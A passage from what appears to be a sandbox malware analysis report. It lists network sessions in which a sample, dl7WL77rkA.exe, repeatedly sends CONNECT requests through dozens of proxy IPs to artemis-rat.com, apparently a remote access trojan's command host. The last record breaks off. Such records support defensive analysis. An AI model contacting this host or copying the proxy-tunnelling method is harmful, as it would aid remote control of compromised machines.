                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1540192.168.2.550107183.96.235.105185723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.012247086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092664003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202053070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.201961994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1541192.168.2.55415038.54.6.3990803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.015697956 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.243484020 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1542192.168.2.553365206.220.175.241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.019180059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1543192.168.2.55414341.231.37.7631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.020776987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.528063059 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1544192.168.2.554117103.216.49.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.028364897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.386403084 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1545192.168.2.553879184.170.245.14841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.030430079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1546192.168.2.554275172.67.3.108803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.030459881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.185097933 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1547192.168.2.554144119.3.215.4188883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.032833099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1548192.168.2.550012154.0.14.11631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.071146965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.145448923 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1549192.168.2.55421938.162.12.8231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.072016954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.516192913 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1550192.168.2.55379046.29.116.341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.072019100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1551192.168.2.554113102.132.201.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.076698065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1552192.168.2.55377860.211.195.150108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.084198952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1553192.168.2.554116111.88.240.20110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.085722923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1554192.168.2.554288104.16.108.234803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.088392973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.243036985 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1555192.168.2.554297172.67.250.212803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.098037004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.259162903 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1556192.168.2.55411474.118.80.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.098038912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1557192.168.2.554299172.67.181.37803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.098160028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.259756088 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1558192.168.2.554305104.21.194.182803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.100167036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.260032892 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1559192.168.2.554308104.16.105.198803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.109563112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.267565966 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1560192.168.2.554333172.67.182.22803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.121196032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.275244951 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1561192.168.2.554127113.204.4.142108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
